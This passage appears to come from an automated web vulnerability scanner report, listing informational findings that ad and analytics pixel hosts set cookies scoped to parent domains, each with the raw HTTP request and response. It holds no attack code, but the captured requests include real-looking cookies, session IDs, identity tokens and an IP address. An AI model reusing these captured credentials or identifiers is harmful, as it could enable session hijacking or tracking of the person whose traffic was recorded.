Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; s_pers=%20s_getnr%3D1300982991291-Repeat%7C1364054991291%3B%20s_nrgvo%3DRepeat%7C1364054991293%3B; MUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.6ef0; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:52 GMT
Server: Apache
Set-Cookie: MUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.6ef0; expires=Sun, 25-Sep-2011 11:30:15 GMT; path=/; domain=b.aol.com
Set-Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; expires=Sun, 25-Sep-2011 11:30:15 GMT; path=/; domain=.aol.com
Set-Cookie: CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; expires=Sun, 27-Mar-2011 08:35:52 GMT; path=/; domain=.aol.com
Cache-Control: max-age=0
Expires: Sat, 26 Mar 2011 20:35:52 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;
14.7. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=&rn=0.8909073872491717&c7=http%3A%2F%2Fexplore.live.com%2Fmicrosoft-service-agreement%3Fref%3Dnone%26mkt%3Den-us&c3=&c4=wldown&c5=&c6=&c10=&c15=&c16=&c8=Microsoft%20Service%20Agreement&c9=&cv=1.7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://explore.live.com/microsoft-service-agreement?ref=none&mkt=en-us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 26 Mar 2011 00:58:50 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Mon, 25-Mar-2013 00:58:50 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

14.8. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=3&c2=6034986&c3=UMAA-UMA-095-33-MRT&c4=STND_MFESRP_FY11H2_BR_CusSrch_1x1&c5=302283223&c6=&cj=1&rn=475410539656877500 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 26 Mar 2011 20:36:08 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Mon, 25-Mar-2013 20:36:08 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
14.9. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=desoundings&d.x=95494307&d.t=page&d.u=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F%27%2BNSFTW%2B%27%3Fordering%3D%26searchphrase%3Dall HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 25 Mar 2011 19:13:28 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Sun, 24-Mar-2013 19:13:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
14.10. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; _SS=SID=0B4014F62A18466497C10109D4CCD2AB; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; OrigMUID=FA3AE6176FAC4414AD6FC26C726B4B15%2cf8d61f728c6f438090026fdef4b23378; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.redcated/c.gif?DI=15074&RedC=c.bing.com&MXFR=FA3AE6176FAC4414AD6FC26C726B4B15
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15&TUID=1; domain=.bing.com; expires=Wed, 12-Oct-2011 00:55:17 GMT; path=/;
Date: Sat, 26 Mar 2011 00:55:17 GMT
Content-Length: 0

14.11. http://c.microsoft.com/trans_pixel.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.microsoft.com
Path:   /trans_pixel.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.asp?source=technet&TYPE=PV&uri=%2fen-us%2fmagazine(d%3ddefault)%2fgg537292(l%3den-us%2cv%3dMSDN.10).aspx&p=_en-us_magazine(d=default)_gg537292(l=en-us,v=MSDN.10).aspx HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg537292.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; ASP.NET_SessionId=ibbdu345amsbmpibe0301ljz; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi\00018@E0H02h8@E0H; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092921512:ss=1301092848759; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=2a3c4c9fe97247d48c9a5163057b9a69; domain=.microsoft.com; expires=Sat, 26-Mar-2011 02:11:20 GMT; path=/
Set-Cookie: A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001:@E0I02h:@E0I; domain=.microsoft.com; expires=Tue, 26-Mar-2041 01:41:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:41:20 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.
14.12. http://explore.live.com/Handlers/Plt.mvc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://explore.live.com
Path:   /Handlers/Plt.mvc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Handlers/Plt.mvc?bicild=&v=15.40.1075 HTTP/1.1
Host: explore.live.com
Proxy-Connection: keep-alive
Referer: http://explore.live.com/microsoft-service-agreement?ref=none&mkt=en-us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MWTMsgr=1; wlidperf=latency=230&throughput=13; mkt=ep=en-US; xid=e974f2b7-a965-4936-8c0d-b729d0ddd997&&SN1xxxxxxxxLP10&122; xidseq=1; mktstate=S=1623281324&U=&E=en-us&B=en-us&P=; mkt1=norm=en-us; mkt2=marketing=en-us; wlexpid=e974f2b7-a965-4936-8c0d-b729d0ddd997; wlv=A|_-d:s*bbcTBg.2+1+0+3; E=P:cKFJ42e5zYg=:DvIDzcNKJyaRN000PJp8Q9uOCAm9eJ/dmlp5TXvwQLc=:F; wla42=; cookiesEnabled=true; BP=VID=0.8133&VC=0&RC=1&LTT=1301101088993&l=WSC.Explore&FR=&ST=; LD=e974f2b7-a965-4936-8c0d-b729d0ddd997_00167faf836_15501_1301101086023=L2967; MUID=FA3AE6176FAC4414AD6FC26C726B4B15

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=31536000
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 25 Mar 2012 00:59:35 GMT
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xidseq=3; domain=.live.com; path=/
Set-Cookie: E=P:OjGZNWi5zYg=:T1n4/jUtxt0z4GHJPQeq34PJVxDRlc0Y6nYWymmNMNM=:F; domain=.live.com; path=/
Set-Cookie: pltmode=1; domain=.live.com; expires=Sat, 26-Mar-2011 00:59:45 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 02-Apr-2011 00:59:35 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 02-Apr-2011 00:59:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 00:59:35 GMT

GIF89a.............!.......,...........2.;
14.13. http://id.google.com/verify/EAAAAI8sWLg3-CQ8dVKhlM8XS4A.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAI8sWLg3-CQ8dVKhlM8XS4A.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAI8sWLg3-CQ8dVKhlM8XS4A.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=sqllite
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=45=9mJOxoe51kqPBzaVaDIYdKBbtYyVJHRFiEOESYCR=aeXXPlMi6V1ArAl4; NID=45=hECaSPNKbGmHQVaeX8QfVjYPb7irgBJrevtV-Ucf8CbbaGBgB7E0-GXnJT1n8t0Kfgh9itDw1n5QPZyWBCgiZYImFLvylkVRtN68wV37kiG2NOQgw1cJtXY_RuWuwwF_; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301157894:GM=1:IG=3:SG=1:S=-z6uTOFgG1wrjiZ-

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=45=0aAU-4KrCTRheBGnwKIcAeMhoBF3p7mXalmI8FY3=DcG0oD1mSduv94Sp; expires=Sun, 25-Sep-2011 16:44:55 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 26 Mar 2011 16:44:55 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
14.14. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=1,99999,61674,60739,60489,60740,60490,56262,56511,61576,60493,50963,60491,60515,60514,52614,53656,52842,56830,52615,60546,56918,60500,56920,56555,56988,51133,54173,56780,56768,56500,52611,54463,56969,56835,54938,61166&guidm=1:16lsqii1n1a3cr&bnum=9145 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; C2=0B4iNZK9EYVVGzEBaVlxMJpwIg02FAHCdbdBwhQshXAcIgZ4FAHCkFeBwhgihXAcIgimGAHCBGeBwhQmhXAcI8eDGAHCjGeBwhAghXAcI8a4FAHCYimBwhw/VYAcIYyoGAHCdDmBwhgkhXAcI8Z4FAHCPGeBwhgQvaAcIERoGAnrrcgj/Z04wmLCMKpBDhpDBEzIG52AMlfh2SwR2XAOy2ZAFFqRpCbJDcYjGHmpIQQ6/YQlwu7ATKpBT0adDoXdGHmrMNwPAaguwK/AqNpBw0qfh0xqGNzsdfgWqao7s6oBK+mhn4a+GM5iGNDpucgG2Y8Ql5QiGvHA3jqxLPrZIMKpGAnp/dQ/SZklyO+BGKqBsL7YHwAoGwugicQvJVo7RGACg2cxnZm5IaAqhyLCnriBw1I9IsfzFAH; GUID=MTMwMDk4ODAyMDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; F1=BgKgL2kAAAAAmc1CAIAAgEgAAAAABK6CAEAAgEABAAAABAAAAYAA4CA; BASE=gKQklmhpjJjpy24mVRcoq4SdsN4DbAQwMFaeqnfwaxhNqD6gryqB6EvxQXY2KV5lL8PiUafUl/jd3CaTb8zQcHMAUV3HWkGbQWfZDNNgjsbfnuO9nV0Nlc61bCpIG8T/su4h8sC0carEnP1KoTJVPzXGhkVlOjx42bzuO8yI3jmN9RQwSzfIwqUqLkoHV94DQtJod/9cIfMmhhUJYd3tXzd8Z082dFw7MdgLZn1KZfSHVvoue6zRhz10Luq2igh0XjoKRJJY7HOYMCVqqqFkTQH!; ROLL=AfAiY6N8IPcM+MCL+oJpPm/nM2ZWyBkHnus73S4ba05NBKaaI40fTiE!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Mar 2011 20:36:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=T5kjNZK9DYVVGP7AaVlxzKpwIg02FAHCdbdBwhQshXAcIIa4FAHCYGeBwhAZhXAcIoY4FAHCoopBwhQghXAcIkZ4FAHCv3gBwhwohXAcIAY4FAHCvGeBwhAmoZAcI8fFGAHCmMqBwhQ3gZAcIIZ4FAHCfGeBwhgQvaAcI8Y4FAHCFBqBwhQEhaAcuuyBO+nRKBbuHwokGoKmOAQMjYU1DwU+F2xAHZfBfKbnBUUoGBBslIwhNaMymiwAp/jB8D7uCMpkGoXr1Jge1ZMyuy0A/AoBhAr8Co2kGcZr+BSHrakmz29BapqhVxqjFo4bG6or5XwkLakmk6iBaYjxqSmDJas4AcPqGLzsmdwokaw1m+nB9LlR9L74HYooGMlsjdADgawUCKyB9mUhVFZAHAazF7sZmjoBPEKvHcuKGcdj0fw+NXw1; domain=advertising.com; expires=Mon, 25-Mar-2013 20:36:35 GMT; path=/
Set-Cookie: GUID=MTMwMTE3MTc5NTsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; domain=advertising.com; expires=Mon, 25-Mar-2013 20:36:35 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 26 Mar 2011 21:36:35 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
14.15. http://pixel.mathtag.com/creative/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /creative/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creative/img?mt_adid=70&mt_aid=54393751066380379&mt_exid=4&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=5:1300987769|1:1300977498|10001:1297818481|10004:1299934992|11:1299460723|2:1299285586|3:1299090747|4:1299460679|9:1300624484; ts=1301103428; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b

Response

HTTP/1.1 200 OK
Server: mt2/1.2.3.967 Oct 13 2010-13:40:24 ewr-pixel-x4 pid 0x5572 21874
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 26 Mar 2011 01:37:34 GMT
Etag: 4d5b2371-3928-7a83-24fb-d52328f5624b
Connection: Keep-Alive
Set-Cookie: ts=1301103454; domain=.mathtag.com; path=/; expires=Sun, 25-Mar-2012 01:37:34 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: trx=008; domain=.mathtag.com; path=/; expires=Sat, 19-Nov-2010 18:21:31 GMT
Set-Cookie: uuid=4d5b2371-3928-7a83-24fb-d52328f5624b; domain=.mathtag.com; path=/; expires=Sun, 25-Mar-2012 01:37:34 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
14.16. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1200291089;fpan=0;fpa=P0-1364029523-1300987777508;ns=0;url=http%3A%2F%2Fwww.huffingtonpost.com%2F2011%2F03%2F26%2Fgeraldine-ferraro-dead-dies_n_840995.html;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=type.article%2Csite_name.The%20Huffington%20Post%2Ctitle.Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075;dst=1;et=1301171825238;tzo=300;a=p-6fTutip1SMLM2;labels=Politics HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EFEAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIAmxoa-B1QxQINUOUA-1tNECDsKi3hkjECEJEABBAswuNGltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=946552&t=2
Set-Cookie: d=EAYAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIAmxocdN95YMUCDVDlAPtbTRAg7Cot4ZIxAhCRAAQQKdLEltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA; expires=Fri, 24-Jun-2011 20:36:18 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: QS

14.17. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-3aud4J6uA4Z6Y.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-3aud4J6uA4Z6Y.gif?labels=InvisibleBox&busty=5314 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
